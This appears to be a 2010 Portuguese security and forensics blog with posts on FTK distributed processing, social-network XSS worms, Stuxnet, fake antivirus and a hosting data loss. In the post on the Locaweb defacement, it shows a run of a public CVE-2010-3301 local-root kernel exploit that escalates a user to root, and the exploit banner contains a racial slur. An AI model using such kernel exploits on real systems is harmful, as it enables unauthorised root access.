Monday, September 27, 2010

Grid Computing aplicado à Computação Forense II

No último post sobre AccessData, falamos sobre processamento distribuído e da implementação da AccessData deste recurso no Forensic Toolkit (FTK), a partir da versão 3.


site da AccessData sobre o processamento distribuído traz alguns gráficos sobre os ganhos obtidos em computação paralela. Resolvi realizar meus próprios testes para medir os ganhos: Utilizando o FTK já existente em meu notebook (Dell Latitude E6410, Core i5, Windows 7 64-bit e 8 GB RAM) como examinador e mais três desktops Dell (Dell Vostro, Core i3, Windows XP 64-bit e 4GB RAM) para o processamento distribuído. Para este teste, processei e indexei uma imagem formato E01 de 17GB de dados.

Máquina examinadora os componentes de processamento distribuído


Estes testes realizados em nosso laboratório refletem o ambiente utilizado pela AccessData para geração dos resultados mostrados a seguir. Todos os computadores utilizados, tanto no examinador quanto no processamento distribuído são na mesma configuração: Windows 7 64-bit, 8GB RAM, AMD Phenom™ II X4 955 Processor 3.20 GHz (quad core). Nestas máquinas foram processadas quatro imagens de tamanhos e quantidades de itens distintos, conforme tabela:


Pelo resultado informado, percebe-se um ganho monstro no processamento das imagens quando se utiliza recurso de processamento distribuído, o que nos instiga mais ainda a testá-lo. O procedimento de configuração é extremamente simples: instala-se um agente nas máquinas que farão o processamento remoto, depois informa ao FTK o endereço IP (ou nome DNS) dos nós remotos. Não tem como ser mais simples...

Voltando ao meu teste, um arquivo de evidência de 17GB (E01) processado em "single node" demorou 2 horas para ser processado e indexado, enquanto utilizando o poder da computação distribuída, o tempo foi de 40 minutos. Estatisticamente, meus testes levaram um tempo maior para ser concluído do que os testes da AccessData, mas isso se deve ao fato de estar utilizando uma rede Gigabit, e não 10 Giga, conforme recomendado. Pude perceber que as máquinas clientes, utilizadas para processamento distribuído, levaram mais tempo para "baixar" a porção de dados a ser processada do que processando a evidencia propriamente dita. Estou providenciando um teste em rede 10 Giga para podermos avaliar realmente a performance das máquinas, mas pelo que eu ví nos testes, a performance é surpreendente. Acredito que os ganhos informados pela AccessData são reais. Voltaremos a falar sobre o processamento distribuído em próximas oportunidades!!


Sunday, September 26, 2010

Vulnerabilidade no YouTube permite mudar títulos de vídeos

Tudo que sabemos por enquanto é que alguém encontrou uma vulnerabilidade no site de vídeos do Google que permite que os títulos do vídeo sejam alterados sem o consentimento dos donos. Dentre os canais afetados estão os de vários artistas do VEVO, além do canal do vlogger brasileiro Felipe Neto.
Quem descobriu a falha alterou diversos títulos para “@migueltarga e @saadzim_ Amaram seu video *-*!” e outras variações. Ao conferir as contas do Twitter de ambos os usuários, pode-se deduzir que foram eles próprios que encontraram e exploraram essa vulnerabilidade. Miguel diz, em inglês, “YouTube Bug, é assim que eles vão consertar! Eu não sou um hacker, eu não tenho nenhuma senha, eu não tenho acesso a nenhuma conta”.

Mais uma falha no Twitter...

O Twitter comunicou no começo da noite deste domingo, que a falha que atingiu o microblog na manhã de hoje já foi corrigida. Segundo o site, foram retirados da página todos os termos ofensivos que entraram no Trending Topics.

Durante todo o dia, era possível entrar no Twitter e se deparar com a mensagem “WTF: [link]”. Ao clicar no link, o usuário publica duas mensagens no site: a primeira com a mesma mensagem que contém o link, e outro com a afirmação “i love anal sex with goats” (“eu amo sexo anal com cabras”). Só foi afetado quem estava logado no twitter.com, não usuários de serviços como o Tweetdeck ou HootSuite.

O vírus foi informalmente batizado de “#wtfworm” com base na mensagem enviada. “Goats” (“Cabras”) foi parar nos Trending Topics (tópicos principais) do Twitter. Diferentemente dos vírus anteriores, a praga deste domingo infectou mais usuários estrangeiros do Twitter, devido à mensagem em inglês (“WTF” é uma sigla para “what the fuck”, ou “que isso?”, numa tradução branda).

Semana de ataques
Na terça-feira (21) o Twitter já havia sofrido um ataque que, no caso, impediu a utilização do microblog. A falha explorada fazia com que, ao passar o mouse em cima de um código publicado por outro usuário, a interface ficasse bagunçada, espalhando o problema para outras pessoas. Já na quinta-feira (23), a rede social Facebook saiu do ar por duas horas e meia por conta de uma falha que sobrecarregou o banco de dados do site.No sábado (25), hackers exploraram uma falha no Orkut, fazendo com que mais de 185 mil usuários fossem infectados e levados para a comunidade "Infectados pelo vírus do Orkut". Neste domingo (26), o YouTube sofreu um ataque que explorava uma falha do site, permitindo que hackers alterassem os títulos dos vídeos.

Ataques Cross-Site Scripting marcam a semana

Ataques XSS estão se tornando um grande problema e piorarão ainda mais se as pessoas não tomarem conhecimento desse tipo de ataque e suas vulnerabilidades.


Vulnerabilidades XSS têm sido encontradas em sites muito populares aqui no Brasil, como Twitter e Orkut.

Muitos administradores de sites falham em não atentar-se para ataques XSS, porque ou eles não sabem muita coisa sobre esse tipo de ataque, ou não os vêem como um problema.

No começo desta semana, alguns usuários do twitter receberam na sua timeline um codigo que cria um box preto no seu profile e, ao clicar ou visitar um profile “infectado” você acaba retuítando automaticamente o código.


Agora é a vez do Orkut: usuários da rede social que receberam recados desejando um Bom Sábado de seus amigos estão recebendo também códigos JavaScript que adicionam os usuários a uma comunidade. Basta  entrar na página de recados para ser direcionado para a página "Infectados pelo Vírus do Orkut", e passar  o "bug" automaticamente para os amigos. Alguns usuários dizem que o script executado pelo worm também adiciona diversas comunidades ao perfil infectado


Na comunidade "Infectados pelo Vírus do Orkut",  Rodrigo Lacerda assume a autoria do bug e explica: "Você chegou aqui através de uma falha grave no orkut. A falha já foi comunicada ao Google e deve ser corrigida em breve. A comunidade só tem o intuito de forçar uma correção mais rápida"

stuxnet, o worm que pode causar danos reais

Programado para destruir ou danificar o programa nuclear iraniano, o Stuxnet chamou a atenção da comunidade de segurança por suas características únicas de design.

Hoje foi noticiado por agências internacionais que o vírus, pelo menos em parte, alcançou seu objetivo. Os iranianos acusaram o golpe como se pode ver neste relato.

O stuxnet infecta os computadores principalmente pela porta USB usando vulnerabilidades do AutoRun.inf em computadores rodando Windows. No entanto, parece que algumas variantes do Stuxnet foram feitas para atacar sistemas embarcados com capacidade específica de reprogramar FPGA e CLP. O objetivo final destas versões é conseguir causar dano físico em equipamentos fabricados pela Siemens que são usados no programa nuclear iraniano.

Uma matéria da Wired do mês de setembro especula que pode ter custado milhares de dolares o desenvolvimento do Stuxnet e que há fortes indícios que não foi feito por amadores.

A Siemens soltou um alerta sobre o assunto mas parece que o alvo do Stuxnet foi atingido. Não sabemos no entanto o tamanho do dano causado e se de fato conseguiu brecar o programa nuclear iraniano.

O pesquisador identificado como Ralph mostra em seu site que os iranianos deram a dica involuntáriamente como mostra o screenshot abaixo.


Para maiores informações, recomendo a leitra do post StuxNet: CyberWarfare existe!, pelo meu amigo Suffert.

Thursday, September 23, 2010

Treinamento sobre soluções AccessData é sucesso no ICCyber


Luiz Sales Rabelo e Adrian Culley no treinamento AccessData
Luiz Sales Rabelo e Adrian Culley no treinamento AccessData
Consultor da Forense Luiz Sales e Adrian Culley da AcessData mostraram na prática os benefícios do FTK e ADLab
 A TechBiz Forense Digital permitiu que o público do ICCyber tirasse a prova dos nove dos equipamentos desenvolvidos por sua parceira norte-americana AccessData, em treinamentos hands on realizados nos dias 16 e 17 de setembro com o  FTK e o ADLab.  As soluções permitem que peritos e examinadores investiguem um caso, detectando incidentes, analisando dados, relatando as ocorrências e preservando judicialmente as evidências coletadas. No caso do ADLab, a investigação pode ser feita de forma colaborativa, dividindo simultaneamente o trabalho entre os diversos profissionais envolvidos no caso.
De posse de um notebook com os softwares instalados, profissionais das forças policiais, Ministérios Públicos e empresas privadas presentes no ICCyber simularam a busca por conteúdo suspeito nas máquinas. A primeira constatação foi a de que não é preciso ser um bom entendedor de tecnologia para lidar com os programas, que têm interfaces altamente intuitivas.
“Você pode deixar 40 Discos Rígidos sendo processados pelo FTK ao mesmo tempo durante um fim de semana, por exemplo, e, mesmo que ocorra algum erro em um dos HD, o processamento das demais máquinas não será interrompido”, explicou Luiz Sales Rabelo, consultor da TechBiz Forense Digital. “À medida que o software vai processando, ele aloca os arquivos encontrados na seção Evidência. Na segunda-feira, o arquivo vai estar todo processado e é só digitar uma palavra-chave para encontrar uma informação desejada”, completou Rabelo, que ministrou o treinamento ao lado de Adrian Culley, da AcessData. 
Os participantes comprovaram a facilidade de encontrar os dados digitando no Data Search a palavra “Money”, referente ao caso de estudo. A busca ocorreu no tempo do clique do mouse porque o índex da ferramenta interage diretamente com o banco de dados Oracle, o que torna a operação muito mais rápida.
Para cada palavra pesquisada, o programa apresenta o número de hits e documentos encontrados, como em uma pesquisa do Google. Também é possível trabalhar com os operadores lógicos ‘and’ e ‘or’. Por exemplo, no caso de se juntar à palavra money containing, o software realiza a pesquisa com containing and money ou containingor money e especifica os arquivos em que cada dupla aparece.
As ferramentas da AccessData também importam o arquivo de palavras-chaves recebido pelo perito para realizar a investigação. Após a importação, o contador da ferramenta alerta a quantidade de itens encontrados no HD contendo as keywords solicitadas. No treinamento prático, o FTK apontou mais de 17 mil hits.
Clicando no botão Overview é possível ver os arquivos em divisões e cabe ao examinador especificar o que deseja ver: apenas arquivos .docx, ou só .doc, ou .txt. E o programa obedece apontando, no caso da prática realizada no ICCyber, 169 arquivos encontrados, entre eles,cookies. “O FTK traz toda a estrutura do disco, todas as partições, incluindo aquele finalzinho do disco, os espaços não particionados, que podem conter informações relevantes para a investigação”, informa Rabelo.
No caso do ADLab, que é a versão laboratório do FTK, o grande diferencial é o processamento distribuído, que permite centralizar as evidências e, ao mesmo tempo, compartilhar os recursos com infinitas máquinas. “O ADLab tem uma interface totalmente web que permite que os revisores dividam as tarefas do caso. Durante a investigação, tudo o que eu achar que é responsivo, que mereça atenção, eu marco com um bookmark, que compila as informações em um relatório. De forma mais clara e prática, se você possui um caso para gerenciar, que envolve fraude dentro da empresa, por exemplo, você dá permissão para que os demais investigadores acessem determinadas informações e já indica no programa: isso é possivelmente uma evidência. Por favor, investigue”, conta Rabelo.

fonte: http://www.forensedigital.com.br/new/treinamento-sobre-solucoes-accessdata-e-sucesso-no-iccyber/

Monday, September 20, 2010

Sites hospedados na Locaweb sofrem deface por hacker turco

O serviço de hospedagem brasileiro Locaweb sofreu um ataque de um cracker turco em 17/09, que tirou diversos sites do ar. Ainda não se sabe a quantidade exata de páginas que sofreram o ataque. Segundo informações de um dos clientes da Locaweb, os sites que estavam em servidores Linux foram afetados, mas os que tinham seus arquivos em máquinas com Windows não tiveram problemas.


Até o site da ICCyber sofreu com a ação.




Ele encontrou uma falha nos servidores da empresa que permitia que arquivos fossem inseridos numa pasta sem permissão para escrita. Assim, vários sites tiveram suas páginas iniciais substituídas pelas criadas pelo hacker.

A solução para reverter o deface é simples: basta logar no FTP do servidor, deletar os arquivos index.htm, index.html, index.php e default.php e fazer upload novamente da versão anterior que, espera-se, foi salva localmente e não na web.
Esta vulneravilidade ficou conhecida como IA32 System Call Entry Point Vulnerability do CentOS.

Se você tem um servidor com centOS x86_64 rodando, pode executar um path de correção, facilmente:

echo ':32bits:M:0:\x7fELF\x01::/bin/echo:' > /proc/sys/fs/binfmt_misc/register

Dados da Falha:

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-3301
https://access.redhat.com/kb/docs/DOC-40265
Bug 634449 - (CVE-2010-3301) CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
Exploit:
Exemplo de uso do exploit:
2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64 x86_64 x86_64
GNU/Linux
[hacky@ks310439 ~]$ id
uid=518(hacky) gid=518(hacky) groups=518(hacky)
[hacky@ks310439 ~]$ ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.3.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=518(hacky) groups=518(hacky)

Sunday, September 19, 2010

ICCyber 2010 - maior evento de perícias em crimer cibernéticos da AL

O ICCyber é o maior evento sobre perícia em crimes cibernéticos da América Latina, foi realizado entre os dias 15 a 17 de setembro em Brasília.



Na conferência, polícias, profissionais de informática forense e pesquisadores de todas as partes do mundo apresentaram seus mais recentes resultados de pesquisa e investigação em crimes cibernéticos e informática forense. O evento ofereceu também seminários e treinamentos, dos quais pude ministrar dois: AccessData FTK 3.0 e AccessData LAB.

O evento foi organizado pela Associação Brasileira de Especialistas em Alta Tecnologia (Abeat), em convênio com a Polícia Federal, por meio do Serviço de Perícias em Informática (Sepinf) do Instituto Nacional de Criminalística (INC). A conferência também contou com o apoio de entidades como a Polícia Federal dos Estados Unidos (FBI).

Veja mais algumas fotos dos treinamentos: (clique para ampliar)




Sunday, September 12, 2010

Trojan pode ter contribuído com queda de avião na Espanha

Autoridades espanholas descobriram que o computador usado para monitorar problemas técnicos do avião da Spanair, que caiu durante a decolagem em agosto de 2008, estava infectado com um malware identificado como um cavalo de tróia. A informação é do jornal El País.

Um relatório interno divulgado pela companhia aérea informou que a máquina infectada não conseguiu detectar três problemas técnicos no avião, os quais, se fossem detectados, teriam impedido a aeronave de decolar. Uma investigação preliminar na época do acidente fatal detectou que o avião decolou com os flats e slaps recolhidos - superfícies articuladas existentes na parte posterior e anterior das asas e dão sustentação à aeronave.
Jamz Yaneeza, diretor de pesquisas da Trend Micro, diz que o trojan pode entrado no sistema da empresa aérea através de diversas formas. As mais prováveis, segundo ele, são dispositivos USB de terceiros e conexões VPN remotas. Drives USB foram responsáveis pela infecção do sistema da Estação Espacial Internacional, em 2008. Já no caso da VPN, o risco existe porque pois nesse tipo de conexão o sistema visitante pode não ter a mesma proteção que os demais computadores da rede empresarial; basta que um arquivo malicioso seja executado em apenas uma máquina para que toda a rede seja infectada.
Sami Saydjari, presidente da Cyber Defense Agency, diz que qualquer computador que esteja conectado a uma rede está vulnerável à infecções por malwares. Segundo ele, não foram configurados padrões para proteger infraestruturas críticas e incidentes assim podem e provavelmente irão acontecer novamente.

Saturday, September 11, 2010

Mesmo antiquado, vírus "Here you Have" chama atenção para a segurança online

Um worm (vírus auto-replicante) conhecido carinhosamente como “Here you Have", nome inspirado no assunto do e-mail infectado, se espalhou rapidamente em um ataque de malware global nas últimas semanas.
A mensagem, simplória e mal redigida, induz usuários a clicar em um link malicioso, demonstrando os motivos pelo qual nós precisamos reformular a abordagem global de defesa contra ameaças online.
Pode parecer déjà vu, mas um vírus enviado com o nome da tenista Anna Kournikova se espalhou pelo mundo em 2001, via e-mail, usando a mesma frase “Here you Have" como assunto. 
Uma década depois, aqui estamos nós, com o mesmo worm, comprometendo dezenas de milhares de máquinas.
"A ameaça contém um link que, supostamente, direcionaria o internauta para uma arquivo PDF. Entretanto, ao clicar nele, é iniciada uma tentativa de desativar os softwares de segurança instalados no PC, além do envio automático da mesma mensagem para todos os contatos cadastrados na caixa de email", de acordo com um porta voz da McAfee.
here_you_have.jpg
Texto contido no e-mail "Here you have"
Segurança
Assim, este resultado mostra que mesmo as melhores práticas de segurança, que têm sido padrão durante quase uma década, ainda são insuficientes para proteger as redes contra um ataque tão rudimentar. Talvez seja o momento para uma nova estratégia de defesa.
"Internautas deveriam se lembrar de seguir as melhores práticas de proteção, sempre manter as definições de vírus atualizadas e evitar clicar em links e/ou anexos em e-mails. Administradores de rede são incentivados a configurar os servidores para bloquear ou remover mensagens que contenham arquivos anexados que, geralmente, são usados para espalhar vírus, nos formatos. VBS. BAT,. EXE,. PIF e arquivos. SCR. O processo utilizado neste caso é um arquivo .SCR", segundo porta-voz da Symantec.
Uma alternativa possível é lutar para desenvolver e implantar assinaturas necessárias para detectar malwares e se defender contra elas.
Organizações podem usar ferramentas como o AppLocker, que faz parte de Windows 7, ou utilitários de terceiros como o McAfee Application Control para uma estratégia proativa. Eles definem quais aplicativos podem ser executados e não apenas tentando impedir aqueles que não são adequados.
(Tony Bradley - Original aqui.)

Friday, September 10, 2010

Grid Computing aplicado à Computação Forense

Quando se chega a um limite de processamento e a famosa Lei de Moore não ajuda, começamos a utilizar uma antiga tática romana: divide et impera (dividir para conquistar). A idéia é utilizar o poder computacional de várias máquinas para executar tarefas computacionais que normalmente levariam muito tempo em somente uma máquina.

Antes de prosseguirmos, é importante relembrarmos alguns conceitos de grid e cluster: Ambos utilizam o poder do processamento paralelo para executar tarefas complexas. A principal diferença entre um cluster e um grid é que um cluster possui um controlador central, um único ponto de onde é possível utilizar todo o poder de processamento do cluster. Já em um Grid, a idéia é utilizar os recursos ociosos de computadores independentes, sem a preocupação de localização física e sem investimentos em novos hardwares: A criação de um supercomputador virtual, com a utilização dos recursos pré- existentes.[1]


E o que isso tem a ver com computação forense? A AccessData, fornecedora dos famosos FTK e PRTK, já disponibiliza recursos de processamento distribuído em seu software de investigação forense, o Forensic Toolkit. Cada licença de FTK é capaz de executar até 4 tarefas de processamento (um na máquina do examinador e 3 nós remotos) para enfrentar grandes conjuntos de dados em uma fração do tempo que seria necessário para uma única máquina. Testes mostraram um aumento expressivo na velocidade de processamento quando se utiliza processamento distribuído. É possível utilizar o hardware de máquinas de núcleo simples ou com múltiplos núcleos. O FTK irá utilizar as capacidades de processamento de qualquer computador disponível. Isso permite ao examinador a flexibilidade para usar o hardware que estiver disponível para melhorar o desempenho de processamento, sem necessidade de investir em novos hardwares. Reduzir o tempo de processamento de grandes volumes de dados é um recurso valioso para as organizações de investigação, agências federais e empresas inundadas com serviços de análise forense.



O procedimento de instalação e configuração do componente de processamento distribuído pode ser obtido no site da AccessData. Eu já adianto que é uma tarefa muito simples: basicamente se instala um aplicativo (Windows Service) nas máquinas remotas e, na máquina do examinador, deve-se informar o endereço dos nós remotos. Simples assim, como todo software deveria ser.



No próximo post, vou publicar os resultados dos testes comparativos entre processamento stand alone e o distributed processing.

Fontes:
[1] - http://www.guiadohardware.net/termos/grid-computing
[2] - http://www.accessdata.com/distributed_processing.html

Hackers “driblam” a Apple e descobrem como fazer jailbreak no iOS 4.1




Poucas horas após o lançamento do iOS 4.1, nova versão do sistema operacional da Apple para dispositivos móveis, hackers do grupo Chronic Dev Team anunciaram a descoberta de uma vulnerabilidade que permite driblar a Apple e “destravar” o aparelho para o uso de softwares não autorizados pela empresa de Steve Jobs.

A notícia, divulgada pelo site Redmond Pie, é importante para quem tem jailbreak porque, ao instalar a versão 4.1 do iOS, esse recurso é automaticamente removido. Tanto que a recomendação, nesses casos, é simplesmente não atualizar. O anúncio dos hackers deixa claro que isso é possível, mas ainda não foi liberada a ferramenta que faz isso para download. Ou seja, por enquanto, nada de jailbreak.

Como essa brecha explora a bootrom do aparelho, a Apple não pode simplesmente soltar uma atualização para impedir o jailbreak. Seria necessário que a empresa lançasse uma versão atualizada de seus equipamentos, alterando o hardware para combater os hackers.

O hacker responsável pela descoberta, pod2g, já testou o chamado exploit no iOS 4.1 e garante que ele funciona inclusive com o iPhone 4, iPod de quarta geração e iPad. Vamos esperar para ver.

Fonte: macworldbrasil.uol.com.br

Dois terços dos usuários da internet são vítimas de fraudes



As vítimas não estão bem informadas e raramente denunciam os crimes  - (Photo by Joe Raedle/Getty Images)
As vítimas não estão bem informadas e raramente denunciam os crimes
SAN FRANCISCO - Quase dois terços dos usuários da internet no mundo foram vítimas da cibercriminalidade, e poucos pensam que é possível encontrar e julgar os fraudadores, segundo um estudo publicado nesta quarta-feira pela empresa de segurança Symantec.

Entre as pessoas entrevistadas pelo estudo batizado de "Relatório Norton de Cibercrime: o impacto humano", 65% dizem ter sido vítima da criminalidade da internet.
A China ocupa o primeiro lugar: 83% dos internautas disseram ter sido infectados por vírus de internet ou afetados por roubos de identidade, fraude de cartões de crédito e outros tipos de golpes, informou o estudo.

Brasil e Índia seguem ambos com 76%, acima dos Estados Unidos (73%).

Em seguida, vêm Nova Zelândia (70%), Itália e Austrália (69%), Canadá (64%), Alemanha e Espanha (62%), Grã-Bretanha (59%), França (57%), Suécia (56%) e Japão (36%).

A Symantec, que apresentou o estudo durante o lançamento da atualização de seu sistema de segurança Norton, explicou que as vítimas, muitas vezes indignadas, não estão bem informadas e raramente denunciam os crimes por pensar que existem poucas possibilidades de se tomar medidas a esse respeito.

Thursday, September 9, 2010

Cybercriminosos usam vírus cada vez mais sofisticados

Se você é daquelas pessoas que se espantam a cada vez que um aviso de vírus salta na tela do computador, tome cuidado. O alerta pode parecer sério, acompanhado de uma logomarca benfeita, mas nem sempre é verdadeiro. Especialistas em segurança na internet alertam que os antivírus falsos estão cada vez mais elaborados. Há, inclusive, os que oferecem suporte on-line 24 horas por dia. O serviço, no entanto, não passa de uma fraude, que pode levar o usuário a entregar dados pessoais e senhas de cartão de crédito a bandidos.

No Brasil, esse malware (1) ainda não é um problema grave. “A maioria dos programas falsos está em inglês, a barreira da língua limita um pouco essa difusão. Mas, de vez em quando, a gente encontra um usuário daqui infectado”, conta o analista de vírus da Kaspersky Lab, Fábio Assolini. O FBI (a agência de investigação norte-americana) calcula que os prejuízos com a disseminação de antivírus falsos cheguem a US$ 150 milhões por ano nos Estados Unidos. “Em 100% dos casos, eles roubam a senha do cartão de crédito do internauta”, diz Mariano Sumrell, da AVG Brasil.

Os cybercriminosos fazem de tudo para que o usuário acredite da validade da ferramenta. Para isso, invadem um site qualquer e inscrevem scripts maliciosos na página, comandos que executam o vírus. Com a invasão, os hackers também fazem com que esse site apareça como um dos primeiros nos buscadores. E isso vale para qualquer tipo de página: institucionais, de notícias, blogs, entre outras. “Quando a pessoa acessar o site, vai aparecer uma tela bonitinha, animada, avisando que o computador foi escaneado e que foram encontrados vírus. Aí o usuário, ingenuamente, acaba fazendo o download do malware”, explica o analista Fábio Assolini.

Vulneráveis
Com o programa instalado na máquina, os falsos alertas ficam mais frequentes. Até que, em determinado momento, surge o aviso de que é necessário comprar o antivírus para continuar mantendo a máquina protegida. “Aí a pessoa acaba sendo roubada duas vezes: quando paga por um serviço que não existe e quando dá a senha do cartão de crédito”, aponta Fábio. Além disso, esses cybercriminosos são próximos de outros criadores de vírus, o que pode deixar a máquina, também, mais vulnerável.

Ouça trechos da entrevista com Mariano Sumrell, da AVG Brasil



Para seduzir os internautas, os disseminadores de falsos antivírus tentam deixar o produto o mais parecido possível com as versões originais. Uma das armas é o uso de nomes pomposos para a ferramenta. “Eles capricham no visual e batizam o serviço com nomes como Super Antivírus 2010”, exemplifica o analista de vírus da Kaspersky Lab. O mais recente mote é o serviço de suporte on-line oferecido na página de compra do programa. Uma pessoa responde às perguntas do usuário tentando convencê-lo a adquirir o falso antivírus.

E engana-se quem pensa que o preço é um dos atrativos. Muitas vezes o programa de mentira é até mais caro que o verdadeiro, ficando na faixa dos US$ 79. Para se ter uma ideia, hoje é possível encontrar opções de antivírus por cerca de US$ 20. Além, é claro, dos gratuitos, que oferecem proteção básica ao computador.

Combate
Impedir que esses malwares invadam o computador depende muito do próprio usuário. Os fabricantes de antivírus tentam monitorar onde há sites que espalham o serviço falso, mas a tarefa é quase impossível devido ao tamanho da internet. “A gente tenta comunicar os sites invadidos, mas isso é muito volátil, eles vão de uma página para outra”, comenta Mariano Sumrell, da AVG Brasil. Outro problema é identificar onde estão os fraudadores.

“Eu nunca vi nenhum antivírus falso descrito em português do Brasil. Uma das regiões mais férteis nesse sentido é o leste europeu, que tem uma cultura bastante rica, mas é socialmente pobre”, afirma Eduardo D’antona, diretor corporativo de Tecnologia da Informação da Panda no Brasil. D’Antona acredita que a penetração dos programas falsos é correspondente ao número de usuários de internet no país. “Do mesmo jeito que há pessoas que compram remédios no camelô, há gente que compra as marcas falsas. É preciso ter em mente que o antivírus de mentira não é uma remédio, é um veneno”, ressalta.

Na dúvida, o melhor é seguir dicas básicas de segurança na internet (veja quadro) ou fazer como o porteiro José Cândido de Sousa, 50 anos, que usa o computador para jogar e baixar músicas. “De vez em quando, aparece um desses avisos. Minha filha disse que não é para aceitar nada. Aí eu só fecho a janela, fico com medo de ser algum vírus”, conta José.

1 - Do mal

Malware é uma expressão genérica que se refere a programas maliciosos que invadem os computadores. A expressão vem do inglês malicious software.

Proteja-se

» Busque marcas conhecidas, consolidadas no mercado
» Se puder, faça a compra presencialmente, em uma loja de sua confiança
» Faça as atualizações dos navegadores (Internet Explorer, Mozilla). As versões antigas apresentam falhas de segurança
» Mantenha o antivírus atualizado. A cada dia, surgem 40 mil novos vírus na internet, as atualizações buscam eliminar essas ameaças
» Desconfie de superofertas, antivírus muito novos com baixo custo
» Caso apareça algum alerta na tela do computador, procure lembrar se realmente instalou aquele programa na máquina

Friday, September 3, 2010

Migre.Me sai do ar e perde toda a base de dados. E o Disaster Recovery??

Ontem eu lí uma reportagem no site da Info sobre uma falha nos servidores do popular serviço para encurtar URLs, o Migre.Me:
No momento, todos os endereços encurtados usando o formato “migre.me/extensão” estão indisponíveis.
Segundo Jonny Ken, criador do serviço, a empresa responsável pela hospedagem do Migre.me colocou os arquivos e o seu backup em uma mesma unidade. No momento, eles tentam recuperar os dados nos HDs, porém não garantem sucesso na empreitada. Ken prefere não informar o nome da prestadora de serviço.
Segundo ele, a mudança de servidor do UOL Host para a nova empresa foi feita visando melhores possibilidades de expansão e orçamento. No antigo serviço, Ken pagava 3 500 reais de assinatura mensalmente.
“No momento, não sei o que falar. A credibilidade do site foi abalada. Não sei se irei começar de novo”, disse Ken.
O Migre.me era o encurtador de URLs mais popular entre os usuários brasileiros do Twitter. Ele também funcionava como um termômetro dos links mais clicados e assuntos mais comentados no site.
Segundo Ken, o serviço se pagava com suas receitas publicitárias. O site acumulava 10 milhões de usuários entre pessoas que encurtam URLs e que navegavam por sua página.

Como sou tuiteiro, divulguei a notícia para os meus seguidores e alguns perguntaram: e o Disaster Recovery? O próprio Jonny ficou surpreso: "Até onde eu sei, nunca os ovos devem ficar numa cesta só". Vejam:



Jonny foi vítima da confiança em um provedor de serviços. Datacenters são uma espécie de Skynet, algo que se imagina impossível de invadir fisicamente, impossível de pegar fogo, etc. Um evento de desastre num local desses só seria possível em caso de enchente, armaggedon, ou algo parecido. Quando se tratam de serviços de alta demanda, uma palavra deve ser religião na empresa: segurança. Principalmente, segurança dos dados do cliente. O migre.me é a empresa do Jonny. É o ganha-pão dele. Não é a toa o estado que ele se encontrava quando gravou o vídeo. Imagino o frio na barriga e o nervosismo dele quando teve a trágica notícia de que os dados foram perdidos.

Não vou falar dos erros da empresa. O Jonny ainda teve a capacidade de não revelar a empresa responsável pelo desastre. Mais cedo ou mais tarde ela será descoberta. Se eu estivesse no lugar dele, já teria xingado até a 5a geração dos donos da empresa e da família deles. É um ABSURDO que um datacenter perca TODOS os dados de um cliente numa manutenção que deveria durar 30 minutos. O mínimo que se espera é que o servidor dedicado tenha RAID, backup em disco em OUTRA máquina e backup em fita.

Sinceramente espero que o Jonny consiga se reerguer.

UPDATE: Segue a explicação oficial da Argohost sobre o ocorrido. No próprio texto, a Argohost assume que SABIA do risco que corria, deixando a storage sem redundância. No desenho mostrado no próprio post da Argohost, eles mostram que na única storage disponível, os HDs (aparentemente) funcionavam num esquema de RAID1 (mirror/espelhamento), ou seja, todos os dados contidos no HD principal são copiados para o HD espelho. Sabe-se lá como (não foi detalhado pela Argohost) conseguiram destruir os dados nos dois HDs. Essa é uma explicação que eu gostaria muito de ter. De qualquer forma, minha opinião é que a Argohost FOI SIM irresponsável, pois assumiu os riscos e acabou por sofrer com a irresponsabilidade dessa operação. Quem pagou o pato foi o Jonny Ken.

História
Foi durante a Campus Party, evento anual de tecnologia realizado em São Paulo, que o gerente de TI, Jonny Ken, teve a ideia de criar seu negócio. O migre.me funcionaria como um compactador de endereços, aos moldes do tinyurl, e misturaria algumas características de rede social, além de se integrar ao Twitter. A partir daí, demorou menos de uma semana para que essa ideia saísse do papel e ganhasse a web. Numa sexta-feira à noite, Ken registrou um domínio que combinasse com o objetivo do serviço. No final de semana, para a alegria da sua namorada, ele passou os dias programando. Segunda e terça foram feitos os testes e, com um empurrãozinho dos seus amigos da blogosfera brasileira, o migre.me estreou com todos os requintes de uma rede social promissora: saiu do ar logo no primeiro dia por causa do número excessivo de usuários. Ken gastou apenas 30 reais para registrar o seu domínio. Marcelo Tas, Carlos Merigo, Rosana Hermann e o blog Kibeloco foram alguns dos que adotaram o serviço desde o seu início para espalhar seus links pela web. 
UPDATE: Novidades no migre.me: